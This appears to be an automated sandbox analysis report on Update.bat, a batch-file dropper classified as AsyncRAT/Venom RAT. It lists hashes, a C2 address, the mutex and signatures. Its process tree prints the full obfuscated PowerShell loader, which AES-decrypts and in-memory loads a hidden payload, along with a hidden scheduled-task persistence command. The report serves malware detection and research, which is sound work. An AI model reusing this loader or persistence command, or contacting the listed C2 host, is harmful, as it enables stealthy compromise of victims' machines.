Analysis
max time kernel: 147s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01/03/2024, 02:05
Static task: static1

General
Target: Update.bat
Size: 305KB
MD5: 9464dc08a0c7c87065f6caed75dec6bd
SHA1: 158d22a58c9ba314a076a62a8bcec466fc1e4165
SHA256: 90253e1be6b5b8928661ce82317b156e1ed4a974e1c6def34414495191e8f50f
SHA512: b8b0dd38c60f8e81fcc9d2efcc76a669441c078aebbb2276c690315002eccc4fcb0317b29c8e542dd7795f2326775212fe4f68af00065afeadc6efcb7e693812
SSDEEP: 6144:Gki8FUxdLGV2qz4aXJVf2cW9A3KAa9K+9E8KTVNlaMwg49oKkIaeF:GX8FqtGVBzfX/f2CaAaXc9TFuofm
Malware Config
Extracted
Family: asyncrat
Version: Venom RAT + HVNC + Stealer + Grabber v6.0.3
Botnet: nostale
C2: 163.5.215.225:1602
Mutex: hoosnuxddbjezlt
Attributes:
  delay: 1
  install: false
  install_file: svchost
  install_folder: %AppData%
Signatures

Async RAT payload (1 IoC)
  resource: behavioral1/memory/4340-97-0x000001CB2EDD0000-0x000001CB2EDE8000-memory.dmp
  yara_rule: family_asyncrat

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
  Key value queried: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation (process: Update.bat.exe)
  Key value queried: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000\Control Panel\International\Geo\Nation (process: WScript.exe)

Executes dropped EXE (2 IoCs)
  PID 3156: Update.bat.exe
  PID 4340: startup_str_424.bat.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Modifies registry class (1 IoC)
  Key created: \REGISTRY\USER\S-1-5-21-557049126-2506969350-2798870634-1000_Classes\Local Settings (process: Update.bat.exe)

Suspicious behavior: EnumeratesProcesses (12 IoCs)
  PID 3156 Update.bat.exe (recorded 2 times)
  PID 4924 powershell.exe (recorded 2 times)
  PID 3888 powershell.exe (recorded 3 times)
  PID 4340 startup_str_424.bat.exe (recorded 3 times)
  PID 4320 powershell.exe (recorded 2 times)

Suspicious use of AdjustPrivilegeToken (64 IoCs, listed per process in the order recorded)
  PID 3156 Update.bat.exe: SeDebugPrivilege
  PID 4924 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 3888 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  PID 3888 powershell.exe (second cycle): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34

Suspicious use of WriteProcessMemory (14 IoCs; each write below was recorded twice)
  PID 3060 cmd.exe wrote to memory of PID 3156 (procid_target 93)
  PID 3156 Update.bat.exe wrote to memory of PID 4924 (procid_target 95)
  PID 3156 Update.bat.exe wrote to memory of PID 3888 (procid_target 98)
  PID 3156 Update.bat.exe wrote to memory of PID 3924 (procid_target 100)
  PID 3924 WScript.exe wrote to memory of PID 876 (procid_target 101)
  PID 876 cmd.exe wrote to memory of PID 4340 (procid_target 103)
  PID 4340 startup_str_424.bat.exe wrote to memory of PID 4320 (procid_target 104)
Processes
(indentation shows the parent/child relationship; the depth number is the level in the process tree)

C:\Windows\system32\cmd.exe (PID 3060, depth 1)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Update.bat"
  - Suspicious use of WriteProcessMemory

  C:\Users\Admin\AppData\Local\Temp\Update.bat.exe (PID 3156, depth 2)
    Command line: "Update.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RBmaF = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Update.bat').Split([Environment]::NewLine);foreach ($_CASH_IjfQb in $_CASH_RBmaF) { if ($_CASH_IjfQb.StartsWith(':: @')) { $_CASH_rvGhe = $_CASH_IjfQb.Substring(4); break; }; };$_CASH_rvGhe = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rvGhe, '_CASH_', '');$_CASH_DkAdB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rvGhe);$_CASH_lMgXj = New-Object System.Security.Cryptography.AesManaged;$_CASH_lMgXj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_lMgXj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_lMgXj.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/1ndH6+lrsjZ2yYUNqKgNPGrHYX/Tct5RucmyyX+KDY=');$_CASH_lMgXj.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qky27F+ZQUxwHZWbtyy/7w==');$_CASH_fRgtG = $_CASH_lMgXj.CreateDecryptor();$_CASH_DkAdB = $_CASH_fRgtG.TransformFinalBlock($_CASH_DkAdB, 0, $_CASH_DkAdB.Length);$_CASH_fRgtG.Dispose();$_CASH_lMgXj.Dispose();$_CASH_BbdgF = New-Object System.IO.MemoryStream(, $_CASH_DkAdB);$_CASH_RhuKx = New-Object System.IO.MemoryStream;$_CASH_PnSrr = New-Object System.IO.Compression.GZipStream($_CASH_BbdgF, [IO.Compression.CompressionMode]::Decompress);$_CASH_PnSrr.CopyTo($_CASH_RhuKx);$_CASH_PnSrr.Dispose();$_CASH_BbdgF.Dispose();$_CASH_RhuKx.Dispose();$_CASH_DkAdB = $_CASH_RhuKx.ToArray();$_CASH_LuMET = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DkAdB);$_CASH_wBIxo = $_CASH_LuMET.EntryPoint;$_CASH_wBIxo.Invoke($null, (, [string[]] ('')))
    - Checks computer location settings
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4924, depth 3)
      Command line: "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\Update')
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 3888, depth 3)
      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_424_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_424.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WScript.exe (PID 3924, depth 3)
      Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_424.vbs"
      - Checks computer location settings
      - Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe (PID 876, depth 4)
        Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_424.bat" "
        - Suspicious use of WriteProcessMemory

        C:\Users\Admin\AppData\Roaming\startup_str_424.bat.exe (PID 4340, depth 5)
          Command line: "startup_str_424.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $_CASH_RBmaF = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_424.bat').Split([Environment]::NewLine);foreach ($_CASH_IjfQb in $_CASH_RBmaF) { if ($_CASH_IjfQb.StartsWith(':: @')) { $_CASH_rvGhe = $_CASH_IjfQb.Substring(4); break; }; };$_CASH_rvGhe = [System.Text.RegularExpressions.Regex]::Replace($_CASH_rvGhe, '_CASH_', '');$_CASH_DkAdB = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($_CASH_rvGhe);$_CASH_lMgXj = New-Object System.Security.Cryptography.AesManaged;$_CASH_lMgXj.Mode = [System.Security.Cryptography.CipherMode]::CBC;$_CASH_lMgXj.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$_CASH_lMgXj.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('/1ndH6+lrsjZ2yYUNqKgNPGrHYX/Tct5RucmyyX+KDY=');$_CASH_lMgXj.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qky27F+ZQUxwHZWbtyy/7w==');$_CASH_fRgtG = $_CASH_lMgXj.CreateDecryptor();$_CASH_DkAdB = $_CASH_fRgtG.TransformFinalBlock($_CASH_DkAdB, 0, $_CASH_DkAdB.Length);$_CASH_fRgtG.Dispose();$_CASH_lMgXj.Dispose();$_CASH_BbdgF = New-Object System.IO.MemoryStream(, $_CASH_DkAdB);$_CASH_RhuKx = New-Object System.IO.MemoryStream;$_CASH_PnSrr = New-Object System.IO.Compression.GZipStream($_CASH_BbdgF, [IO.Compression.CompressionMode]::Decompress);$_CASH_PnSrr.CopyTo($_CASH_RhuKx);$_CASH_PnSrr.Dispose();$_CASH_BbdgF.Dispose();$_CASH_RhuKx.Dispose();$_CASH_DkAdB = $_CASH_RhuKx.ToArray();$_CASH_LuMET = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($_CASH_DkAdB);$_CASH_wBIxo = $_CASH_LuMET.EntryPoint;$_CASH_wBIxo.Invoke($null, (, [string[]] ('')))
          - Executes dropped EXE
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of WriteProcessMemory

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4320, depth 6)
            Command line: "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\startup_str_424')
            - Suspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Enterprise v15
Downloads